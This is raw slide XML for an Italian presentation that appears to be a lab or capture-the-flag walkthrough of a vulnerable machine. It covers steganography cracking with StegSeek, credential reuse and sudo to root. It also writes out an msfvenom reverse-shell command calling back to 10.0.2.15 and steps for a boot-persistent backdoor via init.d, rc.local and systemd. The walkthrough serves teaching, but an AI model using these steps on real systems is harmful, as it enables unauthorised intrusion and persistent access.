              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Navigando nelle directory troviamo un messaggio del creatore della macchina.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B510308-78FA-CE1A-C8C0-DE409877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53" y="2310625"/>
            <a:ext cx="7113843" cy="2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57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079E5A1-27CE-49A4-9775-C35CF198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Exploitation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91130-69EE-0DEB-CE06-B20E8A57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2029975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Continuando a cercare nelle directory troviamo una cartella con 4 file JPEG.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1CFB73-C030-6BA2-D2BD-57CA496E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" y="2864880"/>
            <a:ext cx="7717500" cy="173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43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079E5A1-27CE-49A4-9775-C35CF198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Exploitation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91130-69EE-0DEB-CE06-B20E8A57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2029975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Sono state recuperate queste 4 immagini.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Non avendo trovato altro ci concentriamo su queste e proviamo ad analizzarle per capire se contengono informazioni.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E5A387C-78CF-EC76-D24C-665A9FC4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04" y="3244299"/>
            <a:ext cx="2819418" cy="17515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782261B-09DA-8E6D-FB73-0D964A43D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30" y="2929511"/>
            <a:ext cx="1486072" cy="20299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323EC50-8B77-40F8-E76D-4D24A484D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46" y="2909787"/>
            <a:ext cx="1309558" cy="20694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839D882-43EA-38D3-C80C-39A15374C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823" y="2909787"/>
            <a:ext cx="2069424" cy="20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6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53497" y="3073586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08972" y="3073586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908972" y="1743274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1743286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79" name="Google Shape;2679;p4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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r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831294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Target Exploitation</a:t>
            </a:r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Individuazione dei servizi esposti dalla macchina</a:t>
            </a:r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5964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Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Target</a:t>
            </a:r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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Escalation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Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access</a:t>
            </a:r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831294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Exploitation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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r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831294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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3998769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079E5A1-27CE-49A4-9775-C35CF198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Exploitation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91130-69EE-0DEB-CE06-B20E8A57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2029975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>In particolare ci concentriamo sulla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Steganografia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>una tecnica utilizzata per nascondere file o dati all’interno di file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Utilizziamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>steghide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> per provare ad estrarre le informazioni</a:t>
            </a:r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r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Possiamo vedere come questa ci chiede una «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>passphrase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>» per estrarre le informazioni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4EAC34-9E6B-63B3-3F37-4A162689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2486450"/>
            <a:ext cx="7717500" cy="124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35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079E5A1-27CE-49A4-9775-C35CF198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Exploitation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91130-69EE-0DEB-CE06-B20E8A57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199000"/>
            <a:ext cx="3782575" cy="3639700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Per il cracking della parola d’ordine esistono diversi tool tra cui:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>StegCracker</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>StegSeek</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>In particolare utilizziamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>StegSeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>, versione più recente, che utilizza la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>rockyou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>» per eseguire un attacco a dizionario.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FC0E4-6768-AB45-19CE-82A1BA3A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691" y="1199001"/>
            <a:ext cx="3565056" cy="363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26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079E5A1-27CE-49A4-9775-C35CF198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Exploitation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91130-69EE-0DEB-CE06-B20E8A57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199000"/>
            <a:ext cx="7717500" cy="1643962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>L’output di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>StegSeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> viene scritto in un file, leggendo il risultato dell’estrazione la parola d’ordine era la stringa vuota e il nome originale del file era «remb2.txt», quello che citava il file trovato sul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0"/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endParaRPr lang="it-IT" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>In questo caso troviamo ulteriori credenziali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AD88B8-1032-2C2C-5989-C785406EC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36" y="2733100"/>
            <a:ext cx="7153275" cy="164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0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079E5A1-27CE-49A4-9775-C35CF198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Exploitation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91130-69EE-0DEB-CE06-B20E8A574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199000"/>
            <a:ext cx="7717500" cy="1643962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Proviamo ad utilizzare queste credenziali per autenticarci nel sistema con il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>su, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>ovvero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1"/>
              <a:t>substitute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> user.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D8E1C67-B819-B5FE-C1D4-D79645E1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9" y="2211005"/>
            <a:ext cx="7592551" cy="733562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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7D42E4FE-7024-FAE3-3E67-BDC33D32ADBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713224" y="3354391"/>
            <a:ext cx="7717500" cy="164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39700" indent="0">
              <a:buFont typeface="Source Sans Pro"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Ci siamo autenticati con successo come utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>mhz_c1f</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128363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414813"/>
            <a:ext cx="630855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Post Exploitation</a:t>
            </a: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571233" y="3499789"/>
            <a:ext cx="200151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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Escalation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Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access</a:t>
            </a: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660191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BD45CEF-2200-EB43-B9D0-693B4B7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9525"/>
            <a:ext cx="7981950" cy="478200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Post Exploitation – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Escalation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9A38D61-C314-37BF-4277-654E8567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804149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In questa fase miriamo ad ottenere i privilegi di amministratore.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Banalmente proviamo a controllare se gli utenti sono amministratori nel sistema con il comando «sudo su» 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EA1AE30-14E5-6498-21A6-2E460AF2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03149"/>
            <a:ext cx="7115175" cy="1761601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A875F4C5-A503-85F7-D4A6-5DD47C2BF619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="3751051"/>
            <a:ext cx="7717500" cy="804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39700" indent="0">
              <a:buFont typeface="Source Sans Pro"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Dal risultato notiamo come l’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>mhz_c1f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>è amministratore nel sistema, quindi digitando la sua password si ottengono i permessi di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>root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312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BD45CEF-2200-EB43-B9D0-693B4B7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9525"/>
            <a:ext cx="7981950" cy="478200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Post Exploitation – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access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9A38D61-C314-37BF-4277-654E8567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37159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Utilizziamo il meccanismo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Operating System Backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>in modo da avere accesso persistente alla macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Creiamo una backdoor utilizzando il framework di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>con il seguente comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t> -a x86 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>platform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>/x86/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t> LHOST=10.0.2.15 LPORT=4444 -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t> -o shell-x86.elf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>-a x86 rappresenta l’architettura da utilizzare per il payload;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>-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linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> rappresenta il sistema operativo da utilizzare per il payload;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/x86/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> è il tipo di payload selezionato;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>LHOST=10.0.2.15 è l’indirizzo IP della macchina </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> che permetterà di instaurare una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>connessione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> reverse con la macchina target;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>LPORT=4444 è la porta sulla quale sarà stabilità la connessione;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>-f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> è il formato del payload (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Linkable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Format);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>-o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>shell.elf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> salva il codice generato nel file che segue l’opzione -o.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1397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0841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BD45CEF-2200-EB43-B9D0-693B4B7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9525"/>
            <a:ext cx="7981950" cy="478200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Post Exploitation – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access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9A38D61-C314-37BF-4277-654E8567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37159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L’idea è di far eseguire la backdoor ad ogni accensione del sistema sulla macchina target. Solitamente le funzionalità che vengono eseguite si trovano nella directory «/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/» quindi l’idea è di posizionare qui la nostra backdoor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Creiamo uno script in linguaggio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in modo che la backdoor realizzata venga eseguita da questo script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Questo script e la backdoor sono nella stessa cartella.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03C6FD-D37C-43E9-4ACA-7B5E993D7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1" y="2571750"/>
            <a:ext cx="6096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75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BD45CEF-2200-EB43-B9D0-693B4B7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9525"/>
            <a:ext cx="7981950" cy="478200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Post Exploitation – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access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9A38D61-C314-37BF-4277-654E8567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37159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Successivamente spostiamo questa cartella sulla macchina target tramite  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Secure Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>(SCP). La posizioniamo nel percorso «/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>/» e diamo i permessi di esecuzione con il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> –R +x .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>insh</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Successivamente creiamo un file denominato «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>rc.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>» che contiene una serie di script che il sistema operativo esegue ad ogni avvio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Diamo i permessi di esecuzione anche a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>quest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> ultimo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Creiamo il file «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>rc.local.service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>» nella directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>«/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>/system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>rc-local.service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>»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A45139-3ADE-40FF-DE5B-EFA73BC2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459" y="2260524"/>
            <a:ext cx="2691025" cy="10374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AE2B4E-873F-00AB-2657-1EC14E72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19" y="3297964"/>
            <a:ext cx="3668047" cy="17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2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BD45CEF-2200-EB43-B9D0-693B4B7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9525"/>
            <a:ext cx="7981950" cy="478200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Post Exploitation – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access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9A38D61-C314-37BF-4277-654E8567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37159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Abilitiamo il servizio tramite il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>enable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>rc-local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Lo eseguiamo con il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>rc-local.service</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Controlliamo lo stato del servizio tramite il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
